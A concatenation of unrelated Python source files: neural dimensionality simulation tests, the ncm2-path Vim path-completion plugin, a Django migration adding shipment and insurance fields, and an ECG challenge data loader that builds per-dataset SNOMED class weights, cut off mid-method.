        print(f' = {pct_mfs}% of MFs')
        print(f' = {pct_mf_dim}% of MF dim')
        print(f' = {pct_grc}% of GrCs')
        measure_correlation_by_sharing(sim, acts, save_fname)
def test_dim_similar_input(
        input_graph,
        noise_probs,
        seed=0,
        ):
    removed = input_graph.remove_empty_mfs()
    print(f'Removed {len(removed)} mfs')
    random.seed(seed)
    sim = Simulation(
        input_graph=input_graph,
        )
    n_pattern = 1024*4  # 309
    patterns = sim.generate_patterns(count=n_pattern)
    sim.evaluate(patterns, no_random=True,
                 calibrate_activation_level=.3)
    test_patterns = [patterns[0]]
    for noise in noise_probs:
        print(f'noise={noise}')
        redundant_patterns = sim.add_noise_patterns(test_patterns, prob=noise, n=512)
        sim.evaluate(redundant_patterns, no_random=True)
        acts = sim.get_mfs_activities()
        mf_dim = analysis.get_dim_from_acts(acts)
        print(f'Dim MFs: {mf_dim}')
        acts = sim.get_grc_activities()
        dim = analysis.get_dim_from_acts(acts)
        print(f'Dim GRCs: {dim}')
        pct_grc = int(dim*1000/sim.num_grcs)/10
        pct_mfs = int(dim*1000/sim.num_mfs)/10
        pct_mf_dim = int(dim*1000/mf_dim)/10
        print(f' = {pct_mfs}% of MFs')
        print(f' = {pct_mf_dim}% of MF dim')
        print(f' = {pct_grc}% of GrCs')
def test_replicated_input(
        n_mfs, n_grcs,
        noise_probs,
        seed=0,
        ):
    random.seed(seed)
    for noise in noise_probs:
        print(f'noise={noise}')
        test_patterns = generate_binary_patterns(n_mfs, count=1, f=.3)
        redundant_patterns = add_noise_binary_patterns(test_patterns[0][0], prob=noise, n=512, f=.3)
        dim = analysis.get_dim_from_acts(redundant_patterns)
        print(f'Dim GRCs: {dim}')
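# Self-contained sketch of a participation-ratio dimensionality,
# dim = (sum of covariance eigenvalues)^2 / (sum of squared eigenvalues).
# This is an assumption about what analysis.get_dim_from_acts computes (it
# is not shown in this file); the demo only illustrates the quantity on a
# raw activity matrix of shape (n_patterns, n_units) using numpy.
def _demo_participation_ratio(acts):
    import numpy as np
    acts = np.asarray(acts, dtype=float)
    c = np.atleast_2d(np.cov(acts.T))  # unit-by-unit covariance
    ev = np.linalg.eigvalsh(c)
    return (ev.sum() ** 2) / (ev ** 2).sum()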
# === cache/dein/repos/github.com/ncm2/ncm2-path/pythonx/ncm2_path.py (repo: leafwaltz/raven.nvim, license: MIT) ===
# -*- coding: utf-8 -*-
import vim
from ncm2 import Ncm2Source, getLogger
import re
from os import path, listdir
logger = getLogger(__name__)
class BufPath(Ncm2Source):

    def on_complete(self, ctx, path_pattern):
        typed = ctx['typed']
        filepath = ctx['filepath']
        startccol = ctx['startccol']
        base = ctx['base']

        path_keyword = re.search(path_pattern + '$', typed).group(0)
        dr = path.expandvars(path_keyword)
        dr = path.expanduser(dr)
        expanded = False
        if dr != path_keyword:
            expanded = True
        dr = path.dirname(dr)
        logger.debug('dir: %s', dr)

        label = 'buf'
        base_dir = path.dirname(filepath)
        matcher = self.matcher_get(ctx['matcher'])
        matches = []
        joined_dir = path.join(base_dir, dr.strip('/'))
        logger.debug('searching dir: %s', joined_dir)
        try:
            names = listdir(joined_dir)
            names.sort(key=lambda name: name.lower())
            logger.debug('search result: %s', names)
            for name in names:
                p = path.join(joined_dir, name)
                word = path.basename(p)
                menu = '~' + label
                if expanded:
                    menu += '~ ' + p
                m = dict(word=word, menu=menu)
                if path.isdir(p):
                    m['kind'] = 'd'
                else:
                    m['kind'] = 'f'
                m = self.match_formalize(ctx, m)
                if matcher(base, m):
                    matches.append(m)
        except Exception:
            logger.exception('failed searching dir [%s]', joined_dir)

        refresh = 0
        if len(matches) > 100:
            refresh = 1
            matches = matches[0:100]

        self.complete(ctx, startccol, matches, refresh)
class CwdPath(Ncm2Source):

    def on_complete(self, ctx, path_pattern, cwd):
        typed = ctx['typed']
        startccol = ctx['startccol']
        base = ctx['base']

        path_keyword = re.search(path_pattern + '$', typed).group(0)
        dr = path.expandvars(path_keyword)
        dr = path.expanduser(dr)
        expanded = False
        if dr != path_keyword:
            expanded = True
        dr = path.dirname(dr)
        logger.debug('dir: %s', dr)

        label = 'cwd'
        base_dir = cwd
        matcher = self.matcher_get(ctx['matcher'])
        matches = []
        joined_dir = path.join(base_dir, dr.strip('/'))
        logger.debug('searching dir: %s', joined_dir)
        try:
            names = listdir(joined_dir)
            names.sort(key=lambda name: name.lower())
            logger.debug('search result: %s', names)
            for name in names:
                p = path.join(joined_dir, name)
                word = path.basename(p)
                menu = '~' + label
                if expanded:
                    menu += '~ ' + p
                m = dict(word=word, menu=menu)
                if path.isdir(p):
                    m['kind'] = 'd'
                else:
                    m['kind'] = 'f'
                m = self.match_formalize(ctx, m)
                if matcher(base, m):
                    matches.append(m)
        except Exception:
            logger.exception('failed searching dir [%s]', joined_dir)

        refresh = 0
        if len(matches) > 100:
            refresh = 1
            matches = matches[0:100]

        self.complete(ctx, startccol, matches, refresh)
class RootPath(Ncm2Source):

    def on_complete(self, ctx, path_pattern):
        typed = ctx['typed']
        filepath = ctx['filepath']
        startccol = ctx['startccol']
        base = ctx['base']

        path_keyword = re.search(path_pattern + '$', typed).group(0)
        dr = path.expandvars(path_keyword)
        dr = path.expanduser(dr)
        expanded = False
        if dr != path_keyword:
            expanded = True
        dr = path.dirname(dr)
        logger.debug('dir: %s', dr)
        if not dr.startswith('/'):
            return

        menu = '~root'
        if dr != path_keyword:
            menu = dr

        base_dir = '/'
        matcher = self.matcher_get(ctx['matcher'])
        matches = []
        joined_dir = path.join(base_dir, dr)
        logger.debug('searching dir: %s', joined_dir)
        try:
            names = listdir(joined_dir)
            names.sort(key=lambda name: name.lower())
            logger.debug('search result: %s', names)
            for name in names:
                p = path.join(joined_dir, name)
                word = path.basename(p)
                m = dict(word=word, menu=menu)
                if path.isdir(p):
                    m['kind'] = 'd'
                else:
                    m['kind'] = 'f'
                m = self.match_formalize(ctx, m)
                if matcher(base, m):
                    matches.append(m)
        except Exception:
            logger.exception('failed searching dir [%s]', joined_dir)

        refresh = 0
        if len(matches) > 100:
            refresh = 1
            matches = matches[0:100]

        self.complete(ctx, startccol, matches, refresh)
buf_path = BufPath(vim)
cwd_path = CwdPath(vim)
root_path = RootPath(vim)
on_complete_bufpath = buf_path.on_complete
on_complete_cwdpath = cwd_path.on_complete
on_complete_rootpath = root_path.on_complete
# === web/transiq/team/migrations/0035_auto_20170628_2227.py (repo: manibhushan05/transiq, license: Apache-2.0) ===
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-28 22:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    dependencies = [
        ('utils', '0005_aahooffice_branch_name'),
        ('team', '0034_nontransactionalexpense'),
    ]

    operations = [
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_address',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_city',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_city_fk',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lr_consignee_manual_full', to='utils.City'),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_cst_tin',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_name',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_phone',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignee_pin',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_address',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_city',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_city_fk',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='lr_consignor_manual_full', to='utils.City'),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_cst_tin',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_name',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_phone',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='consignor_pin',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='from_city',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='insurance_date',
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='insurance_policy_number',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='insurance_provider',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='insurance_risk',
            field=models.CharField(blank=True, max_length=200, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='insured_amount',
            field=models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=30, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='is_insured',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='liability_of_service_tax',
            field=models.CharField(blank=True, max_length=40, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='to_city',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='lrnumber',
            name='unloading_date',
            field=models.DateField(blank=True, null=True),
        ),
    ]
# model_training/training.py
import torch
from torch.utils.data import DataLoader
from torch.utils.data.dataloader import default_collate
import numpy as np
import time
from model_training.utils import loadmat, CustomTensorDataset, load_weights, load_labels, resample, slide_and_cut, load_challenge_data
from model_training.util import my_find_challenge_files
import os
from utils.denoising import filter_and_detrend
from torchvision import datasets, transforms
import utils.transformers as module_transformers
from model_training.custom_dataset import CustomDataset4PeakDetection
# Challenge Dataloaders and Challenge metrics
class BaseDataLoader(DataLoader):
    """
    Base class for all data loaders
    """
    def __init__(self, train_dataset, val_dataset, test_dataset, batch_size, shuffle, num_workers,
                 collate_fn=default_collate, pin_memory=True):
        self.train_dataset = train_dataset
        self.val_dataset = val_dataset
        self.test_dataset = test_dataset
        self.batch_size = batch_size
        self.batch_idx = 0
        self.shuffle = shuffle
        self.init_kwargs = {
            'dataset': self.train_dataset,
            'batch_size': batch_size,
            'shuffle': self.shuffle,
            'collate_fn': collate_fn,
            'num_workers': num_workers,
            'pin_memory': pin_memory,
            'drop_last': True
        }
        super().__init__(**self.init_kwargs)
        self.n_samples = len(self.train_dataset)

        self.valid_data_loader_init_kwargs = {
            'dataset': self.val_dataset,
            'batch_size': batch_size,
            'shuffle': self.shuffle,
            'collate_fn': collate_fn,
            'num_workers': num_workers,
            'pin_memory': pin_memory,
            'drop_last': True
        }
        self.valid_data_loader = DataLoader(**self.valid_data_loader_init_kwargs)
        self.valid_data_loader.n_samples = len(self.val_dataset)

        if self.test_dataset:
            self.test_data_loader_init_kwargs = {
                'dataset': self.test_dataset,
                'batch_size': batch_size,
                'shuffle': False,
                'collate_fn': collate_fn,
                'num_workers': num_workers,
                'pin_memory': pin_memory,
                'drop_last': True
            }
            self.test_data_loader = DataLoader(**self.test_data_loader_init_kwargs)
            self.test_data_loader.n_samples = len(self.test_dataset)
class ChallengeDataset:
    """
    challenge2020 data loading
    """
    def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500,
                 window_size=4992, n_segment=1, normalization=False, training_size=None, augmentations=None,
                 p=0.5, lead_number=12, save_data=False, load_saved_data=False):
        self.label_dir = label_dir
        self.dir2save_data = '/data/ecg/challenge2021/data/'
        dir2save_data = '/data/ecg/challenge2021/data/'
        start = time.time()

        # Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
        weights_file = 'weights.csv'

        # Load the scored classes and the weights for the Challenge metric.
        print('Loading weights...')
        _, weights, indices = load_weights(weights_file)
        classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
        ### equivalent SNOMED CT codes merged, noted as the larger one
        classes = classes.split(',')
        self.weights = weights

        # Load the label and output files.
        print('Loading label and output files...')
        label_files = my_find_challenge_files(label_dir)
        # label_files_tmp = []
        # for f in label_files:
        #     fname = f.split('/')[-1].split('.')[0]
        #     if fname[0] == 'A' or fname[0] == 'E':
        #         continue
        #     label_files_tmp.append(f)
        # label_files = label_files_tmp
        labels_onehot = load_labels(label_files, classes)

        split_idx = loadmat(split_index)
        train_index, val_index = split_idx['train_index'], split_idx['val_index']
        train_index = train_index.reshape((train_index.shape[1],))
        if training_size is not None:  # for test
            train_index = train_index[0:training_size]
        val_index = val_index.reshape((val_index.shape[1],))
        # test_index = test_index.reshape((test_index.shape[1],))

        num_files = len(label_files)
        train_number = 0
        val_number = 0
        for i in range(num_files):
            if i in train_index:
                train_number += 1
            elif i in val_index:
                val_number += 1
        print("train number: {}, val number: {}".format(train_number, val_number))

        train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
        train_class_weights = np.zeros((train_number, 26,), dtype=float)
        train_labels_onehot = np.zeros((train_number, 26,), dtype=float)
        val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
        val_class_weights = np.zeros((val_number, 26,), dtype=float)
        val_labels_onehot = np.zeros((val_number, 26,), dtype=float)
        # file_names = list()

        ### class weights for datasets
        # equivalent diagnose [['713427006', '59118001'], ['63593006', '284470004'], ['427172004', '17338001'], ['733534002', '164909002']]
        # CPSC
        CPSC_classes = ['270492004', '164889003', '733534002', '63593006', '426783006', '713427006']  # "59118001" = "713427006"
        CPSC_class_weight = np.zeros((26,))
        for cla in CPSC_classes:
            CPSC_class_weight[classes.index(cla)] = 1
        # CPSC_extra
        CPSC_extra_excluded_classes = ['6374002', '39732003', '445118002', '251146004', '365413008',
                                       '164947007', '365413008', '164947007', '698252002', '426783006',
                                       '10370003', '111975006', '164917005', '47665007', '427393009',
                                       '426177001', '164934002', '59931005']
        CPSC_extra_class_weight = np.ones((26,))
        for cla in CPSC_extra_excluded_classes:
            CPSC_extra_class_weight[classes.index(cla)] = 0
        # PTB-XL
        PTB_XL_excluded_classes = ['6374002', '426627000', '365413008', '427172004']  # , '17338001'
        PTB_XL_class_weight = np.ones((26,))
        for cla in PTB_XL_excluded_classes:
            PTB_XL_class_weight[classes.index(cla)] = 0
        # G12ECG
        G12ECG_excluded_classes = ['10370003', '365413008', '164947007']
        G12ECG_class_weight = np.ones((26,))
        for cla in G12ECG_excluded_classes:
            G12ECG_class_weight[classes.index(cla)] = 0
        # Chapman Shaoxing
        Chapman_excluded_classes = ['6374002', '426627000', '713426002', '445118002', '10370003', '365413008',
                                    '427172004', '427393009', '427084000', '63593006']
        Chapman_class_weight = np.ones((26,))
        for cla in Chapman_excluded_classes:
            Chapman_class_weight[classes.index(cla)] = 0
        # Ningbo
        Ningbo_excluded_classes = ['164889003', '164890007', '426627000']
        Ningbo_class_weight = np.ones((26,))
        for cla in Ningbo_excluded_classes:
            Ningbo_class_weight[classes.index(cla)] = 0

        train_num = 0
        val_num = 0
        for i in range(num_files):
            print('{}/{}'.format(i + 1, num_files))
            recording, header, name = load_challenge_data(label_files[i], label_dir)
            if name[0] == 'S' or name[0] == 'I':  # filter PTB or St.P dataset
                continue
            elif name[0] == 'A':  # CPSC
                class_weight = CPSC_class_weight
            elif name[0] == 'Q':  # CPSC-extra
                class_weight = CPSC_extra_class_weight
            elif name[0] == 'H':  # PTB-XL
                class_weight = PTB_XL_class_weight
            elif name[0] == 'E':  # G12ECG
                class_weight = G12ECG_class_weight
            elif name[0] == 'J' and int(name[2:]) <= 10646:  # Chapman
                class_weight = Chapman_class_weight
            elif name[0] == 'J' and int(name[2:]) > 10646:  # Ningbo
                class_weight = Ningbo_class_weight
            else:
                print('warning! not from one of the datasets: ', name)
                continue
            recording[np.isnan(recording)] = 0

            # divide ADC_gain and resample
            recording = resample(recording, header, resample_Fs)
            # to filter and detrend samples
            recording = filter_and_detrend(recording)
            # slide and cut
            recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
            # file_names.append(name)

            if i in train_index:
                for j in range(recording.shape[0]):  # segment number = 1 -> j=0
                    train_recordings[train_num] = recording[j]
                    train_labels_onehot[train_num] = labels_onehot[i]
                    train_class_weights[train_num] = class_weight
                    train_num += 1
            elif i in val_index:
                for j in range(recording.shape[0]):
                    val_recordings[val_num] = recording[j]
                    val_labels_onehot[val_num] = labels_onehot[i]
                    val_class_weights[val_num] = class_weight
                    val_num += 1
            else:
                pass

        # # Normalization
        # if normalization:
        #     train_recordings = self.normalization(train_recordings)
        #     val_recordings = self.normalization(val_recordings)

        train_recordings = torch.from_numpy(train_recordings)
        train_class_weights = torch.from_numpy(train_class_weights)
        train_labels_onehot = torch.from_numpy(train_labels_onehot)
        val_recordings = torch.from_numpy(val_recordings)
        val_class_weights = torch.from_numpy(val_class_weights)
        val_labels_onehot = torch.from_numpy(val_labels_onehot)

        self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
        self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)

        end = time.time()
        print('time to get and process data: {}'.format(end - start))
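# The per-dataset weight construction above follows one pattern: start from
# all-ones and zero out the classes a source dataset never labels (CPSC goes
# the other way: start from zeros and set its six scored classes to one).
# A minimal standalone sketch of the masking step; the helper name
# `mask_weights` is illustrative and not part of this module.

```python
def mask_weights(classes, excluded):
    """Weight 1.0 for scored classes, 0.0 for classes a dataset never labels."""
    return [0.0 if c in excluded else 1.0 for c in classes]
```

Applied with the 26-entry SNOMED list and, say, the Ningbo exclusions, this reproduces the `Ningbo_class_weight` vector built above.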
class FineTuningDataset:
    """
    challenge2020 data loading
    """
    def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500,
                 window_size=4992, n_segment=1, normalization=False, training_size=None, augmentations=None,
                 p=0.5, lead_number=12, save_data=False, load_saved_data=False):
        self.label_dir = label_dir
        self.dir2save_data = '/data/ecg/challenge2021/data/'
        dir2save_data = '/data/ecg/challenge2021/data/'
        start = time.time()

        # Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
        weights_file = 'weights.csv'

        # Load the scored classes and the weights for the Challenge metric.
        print('Loading weights...')
        _, weights, indices = load_weights(weights_file)
        classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
        ### equivalent SNOMED CT codes merged, noted as the larger one
        classes = classes.split(',')
        self.weights = weights

        # Load the label and output files.
        print('Loading label and output files...')
        label_files = my_find_challenge_files(label_dir)
        label_files_tmp = []
        for f in label_files:
            fname = f.split('/')[-1].split('.')[0]
            if fname[0] == 'A' or fname[0] == 'E':
                label_files_tmp.append(f)
        label_files = label_files_tmp
        labels_onehot = load_labels(label_files, classes)

        split_idx = loadmat(split_index)
        train_index, val_index = split_idx['train_index'], split_idx['val_index']
        train_index = train_index.reshape((train_index.shape[1],))
        if training_size is not None:  # for test
            train_index = train_index[0:training_size]
        val_index = val_index.reshape((val_index.shape[1],))
        # test_index = test_index.reshape((test_index.shape[1],))

        num_files = len(label_files)
        train_number = 0
        val_number = 0
        for i in range(num_files):
            if i in train_index:
                train_number += 1
            elif i in val_index:
                val_number += 1
        print("train number: {}, val number: {}".format(train_number, val_number))

        train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
        train_class_weights = np.zeros((train_number, 26,), dtype=float)
        train_labels_onehot = np.zeros((train_number, 26,), dtype=float)
        val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
        val_class_weights = np.zeros((val_number, 26,), dtype=float)
        val_labels_onehot = np.zeros((val_number, 26,), dtype=float)
        # file_names = list()

        ### class weights for datasets
        # equivalent diagnose [['713427006', '59118001'], ['63593006', '284470004'], ['427172004', '17338001'], ['733534002', '164909002']]
        # CPSC
        CPSC_classes = ['270492004', '164889003', '733534002', '63593006', '426783006', '713427006']  # "59118001" = "713427006"
        CPSC_class_weight = np.zeros((26,))
        for cla in CPSC_classes:
            CPSC_class_weight[classes.index(cla)] = 1
        # CPSC_extra
        CPSC_extra_excluded_classes = ['6374002', '39732003', '445118002', '251146004', '365413008',
                                       '164947007', '365413008', '164947007', '698252002', '426783006',
                                       '10370003', '111975006', '164917005', '47665007', '427393009',
                                       '426177001', '164934002', '59931005']
        CPSC_extra_class_weight = np.ones((26,))
        for cla in CPSC_extra_excluded_classes:
            CPSC_extra_class_weight[classes.index(cla)] = 0
        # PTB-XL
        PTB_XL_excluded_classes = ['6374002', '426627000', '365413008', '427172004']  # , '17338001'
        PTB_XL_class_weight = np.ones((26,))
        for cla in PTB_XL_excluded_classes:
            PTB_XL_class_weight[classes.index(cla)] = 0
        # G12ECG
        G12ECG_excluded_classes = ['10370003', '365413008', '164947007']
        G12ECG_class_weight = np.ones((26,))
        for cla in G12ECG_excluded_classes:
            G12ECG_class_weight[classes.index(cla)] = 0
        # Chapman Shaoxing
        Chapman_excluded_classes = ['6374002', '426627000', '713426002', '445118002', '10370003', '365413008',
                                    '427172004', '427393009', '427084000', '63593006']
        Chapman_class_weight = np.ones((26,))
        for cla in Chapman_excluded_classes:
            Chapman_class_weight[classes.index(cla)] = 0
        # Ningbo
        Ningbo_excluded_classes = ['164889003', '164890007', '426627000']
        Ningbo_class_weight = np.ones((26,))
        for cla in Ningbo_excluded_classes:
            Ningbo_class_weight[classes.index(cla)] = 0

        train_num = 0
        val_num = 0
        for i in range(num_files):
            print('{}/{}'.format(i + 1, num_files))
            recording, header, name = load_challenge_data(label_files[i], label_dir)
            if name[0] == 'S' or name[0] == 'I':  # filter PTB or St.P dataset
                continue
            elif name[0] == 'A':  # CPSC
                class_weight = CPSC_class_weight
            elif name[0] == 'Q':  # CPSC-extra
                class_weight = CPSC_extra_class_weight
            elif name[0] == 'H':  # PTB-XL
                class_weight = PTB_XL_class_weight
            elif name[0] == 'E':  # G12ECG
                class_weight = G12ECG_class_weight
            elif name[0] == 'J' and int(name[2:]) <= 10646:  # Chapman
                class_weight = Chapman_class_weight
            elif name[0] == 'J' and int(name[2:]) > 10646:  # Ningbo
                class_weight = Ningbo_class_weight
            else:
                print('warning! not from one of the datasets: ', name)
                continue
            recording[np.isnan(recording)] = 0

            # divide ADC_gain and resample
            recording = resample(recording, header, resample_Fs)
            # to filter and detrend samples
            recording = filter_and_detrend(recording)
            # slide and cut
            recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
            # file_names.append(name)

            if i in train_index:
                for j in range(recording.shape[0]):  # segment number = 1 -> j=0
                    train_recordings[train_num] = recording[j]
                    train_labels_onehot[train_num] = labels_onehot[i]
                    train_class_weights[train_num] = class_weight
                    train_num += 1
            elif i in val_index:
                for j in range(recording.shape[0]):
                    val_recordings[val_num] = recording[j]
                    val_labels_onehot[val_num] = labels_onehot[i]
                    val_class_weights[val_num] = class_weight
                    val_num += 1
            else:
                pass

        train_recordings = torch.from_numpy(train_recordings)
        train_class_weights = torch.from_numpy(train_class_weights)
        train_labels_onehot = torch.from_numpy(train_labels_onehot)
        val_recordings = torch.from_numpy(val_recordings)
        val_class_weights = torch.from_numpy(val_class_weights)
        val_labels_onehot = torch.from_numpy(val_labels_onehot)

        self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
        self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)

        end = time.time()
        print('time to get and process data: {}'.format(end - start))
class Domain_Dataset:
    """
    challenge2020 data loading
    """
    def __init__(self, label_dir, split_index, batch_size=128, shuffle=True, num_workers=0, resample_Fs=500,
                 window_size=4992, n_segment=1, normalization=False, training_size=None, augmentations=None,
                 p=0.5, lead_number=12, save_data=False, load_saved_data=False):
        self.label_dir = label_dir
        self.dir2save_data = '/data/ecg/challenge2021/data/'
        dir2save_data = '/data/ecg/challenge2021/data/'
        start = time.time()

        # Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
        weights_file = 'weights.csv'

        # Load the scored classes and the weights for the Challenge metric.
        print('Loading weights...')
        _, weights, indices = load_weights(weights_file)
        classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
        ### equivalent SNOMED CT codes merged, noted as the larger one
        classes = classes.split(',')
        self.weights = weights

        # Load the label and output files.
        print('Loading label and output files...')
        label_files = my_find_challenge_files(label_dir)
        label_files_tmp = []
        for f in label_files:
            fname = f.split('/')[-1].split('.')[0]
            if fname[0] == 'A' or fname[0] == 'E':
                label_files_tmp.append(f)
        label_files = label_files_tmp

        split_idx = loadmat(split_index)
        train_index, val_index = split_idx['train_index'], split_idx['val_index']
        train_index = train_index.reshape((train_index.shape[1],))
        if training_size is not None:  # for test
            train_index = train_index[0:training_size]
        val_index = val_index.reshape((val_index.shape[1],))
        # test_index = test_index.reshape((test_index.shape[1],))

        num_files = len(label_files)
        train_number = 0
        val_number = 0
        for i in range(num_files):
            if i in train_index:
                train_number += 1
            elif i in val_index:
                val_number += 1
        print("train number: {}, val number: {}".format(train_number, val_number))

        train_recordings = np.zeros((train_number, 12, window_size), dtype=float)
        train_class_weights = np.zeros((train_number, 2,), dtype=float)
        train_labels_onehot = np.zeros((train_number, 2,), dtype=float)
        val_recordings = np.zeros((val_number, 12, window_size), dtype=float)
        val_class_weights = np.zeros((val_number, 2,), dtype=float)
        val_labels_onehot = np.zeros((val_number, 2,), dtype=float)

        train_num = 0
        val_num = 0
        for i in range(num_files):
            print('{}/{}'.format(i + 1, num_files))
            recording, header, name = load_challenge_data(label_files[i], label_dir)
            if name[0] == 'A':  # CPSC
                dataset_label = np.array([1, 0])
                class_weight = np.array([1, 1])
            elif name[0] == 'E':  # G12ECG
                dataset_label = np.array([0, 1])
                class_weight = np.array([1, 1])
            else:
                print('warning! not from one of the datasets: ', name)
                continue
            recording[np.isnan(recording)] = 0

            # divide ADC_gain and resample
            recording = resample(recording, header, resample_Fs)
            # to filter and detrend samples
            recording = filter_and_detrend(recording)
            # slide and cut
            recording = slide_and_cut(recording, n_segment, window_size, resample_Fs)
            # file_names.append(name)

            if i in train_index:
                for j in range(recording.shape[0]):  # segment number = 1 -> j=0
                    train_recordings[train_num] = recording[j]
                    train_labels_onehot[train_num] = dataset_label
                    train_class_weights[train_num] = class_weight
                    train_num += 1
            elif i in val_index:
                for j in range(recording.shape[0]):
                    val_recordings[val_num] = recording[j]
                    val_labels_onehot[val_num] = dataset_label
                    val_class_weights[val_num] = class_weight
                    val_num += 1
            else:
                pass

        train_recordings = torch.from_numpy(train_recordings)
        train_class_weights = torch.from_numpy(train_class_weights)
        train_labels_onehot = torch.from_numpy(train_labels_onehot)
        val_recordings = torch.from_numpy(val_recordings)
        val_class_weights = torch.from_numpy(val_class_weights)
        val_labels_onehot = torch.from_numpy(val_labels_onehot)

        self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
        self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)

        end = time.time()
        print('time to get and process data: {}'.format(end - start))
class ChallengeDataLoader(BaseDataLoader):
    """
    challenge2020 data loading
    """
    def __init__(self, train_dataset, val_dataset, batch_size=256, shuffle=True, num_workers=0):
        self.train_dataset = train_dataset
        self.val_dataset = val_dataset
        super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
        # self.valid_data_loader.file_names = file_names
        # self.valid_data_loader.idx = val_index
class FineTuningDataset_2(BaseDataLoader):
    """
    challenge2020 data loading
    """
    def __init__(self, label_dir, split_index, batch_size=256, shuffle=True, num_workers=2, resample_Fs=300,
                 window_size=3000, n_segment=1, normalization=False, training_size=None, train_aug=None,
                 val_aug=None, p=0.5, lead_number=2, save_data=False, load_saved_data=False,
                 to_extract_peaks=False, to_contrast=False, to_filter_noise=False, network_factor=32,
                 to_include_E=True, dataset_name='CustomDataset'):
        self.label_dir = label_dir
        self.dir2save_data = '/data/ecg/challenge2021/data/'
        dir2save_data = '/data/ecg/challenge2021/data/'
        start = time.time()

        # Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
        weights_file = 'weights.csv'

        # Load the scored classes and the weights for the Challenge metric.
        print('Loading weights...')
        _, weights, indices = load_weights(weights_file)
        classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
        ### equivalent SNOMED CT codes merged, noted as the larger one
        classes = classes.split(',')
        self.weights = weights

        # Load the label and output files.
        print('Loading label and output files...')
        label_files = my_find_challenge_files(label_dir)
        ### load file names
        # idx2del = np.load('process/idx2del.npy')
        label_files_tmp = []
        count = 0
        for f in label_files:
            count += 1
            fname = f.split('/')[-1].split('.')[0]
            if fname[0] == 'A' or fname[0] == 'E':
                label_files_tmp.append(f)
        label_files = label_files_tmp
        labels_onehot = load_labels(label_files, classes)

        split_idx = loadmat(split_index)
        train_index, val_index = split_idx['train_index'], split_idx['val_index']
